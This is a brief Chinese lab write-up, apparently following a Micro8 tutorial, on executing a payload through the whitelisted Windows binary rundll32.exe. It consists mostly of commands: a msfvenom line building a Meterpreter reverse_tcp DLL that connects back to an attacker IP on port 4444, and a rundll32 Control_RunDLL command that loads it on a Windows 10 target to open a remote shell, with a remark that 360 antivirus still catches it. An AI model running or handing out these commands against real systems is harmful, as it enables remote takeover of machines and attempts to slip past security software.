0x00 Rundll32简介:
Rundll32.exe是指“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。
0x01 环境
攻击机kali 192.168.5.102
靶机win10 192.168.1.127
靶机装有数字AV
0x02 复现
攻击机配置
靶机运行
rundll32 shell32.dll,Control_RunDLL C:\Users\Administrator\Desktop\shellcode.dll
弹回
0x03 dll文件生成
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.102 lport=4444 -f dll > shellcode.dll
0x04 总结
不过360
0x05 借鉴
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/81_基于白名单Rundll32.exe执行payload第十一季.html